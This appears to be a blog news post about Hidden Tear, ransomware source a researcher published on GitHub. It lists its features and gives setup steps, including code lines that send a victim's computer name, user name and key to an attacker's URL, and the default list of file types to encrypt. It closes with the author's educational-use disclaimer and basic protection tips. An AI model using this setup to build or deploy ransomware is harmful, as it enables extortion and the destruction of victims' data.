Utku Sen, a turkish security researcher has posted fully functional ransomware code on code sharing website Github. The ransomware named as Hidden Tear uses the AES encryption for locking the files before displaying the ransom message to get user to pay up.
Utku Sen describes his Ransomware as "a ransomware-like file crypter sample which can be modified for specific purposes." This means even script kiddies can now develop their own Ransomware to threaten people.
The Hidden Tear — Free Ransomware Kit
The "Hidden Tear" Ransomware package consists of four files namely:
Hidden Tear Ransomware is capable of:
- Small file size (12 KB)
- Using AES algorithm to encrypt files
- Evading detection by all standard anti-virus programs
- Sending encryption key to a server
- Creating a text file in Desktop with given message
- Encrypting files and decrypting them using a decrypter program with the encryption key
How to Setup your Custom Ransomware Using Hidden Tear?
Sen has specified usage details as well, he says:
1. You need to have a web server that supports scripting languages such as PHP or Python. Then change the below-mentioned line with your URL. (Better use HTTPS connection in order to avoid eavesdropping):
string targetURL = "https://www.example.com/hidden-tear/write.php?info=";
2. The script should write the GET parameter to a text file. Sending process running in SendPassword() function:
string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);
3. Target file extensions can also be change. Default list:
var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
According to Sen,
"While this may be helpful for some, there are significant risks. The 'Hidden Tear' may be used only for 'Educational Purposes.' Do not use it as a Ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent."
Follow some important steps that should be considered to protect yourself from Ransomware threats.
- Always keep regular backups of your important data.
- Make sure you run an active anti-virus security suite of tools on your system.
- Do not open email attachments from unknown sources.
- Most importantly, always browse the Internet safely. source
No comments:
Post a Comment